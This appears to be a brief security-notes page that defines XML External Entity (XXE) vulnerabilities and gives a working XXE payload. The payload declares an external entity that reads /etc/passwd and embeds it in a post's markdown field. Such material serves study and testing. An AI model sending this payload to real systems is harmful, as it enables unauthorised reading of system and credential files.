XXE
XML External Entity
XXE vulnerabilities arise when an XML document contains a reference to an external entity, which the parser resolves.
Last updated
XML External Entity
XXE vulnerabilities arise when an XML document contains a reference to an external entity, which the parser resolves.
Last updated
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd"> ]>
<post>
<title>Tokyo's Post</title>
<description>Read File</description>
<markdown>&file;</markdown>
</post>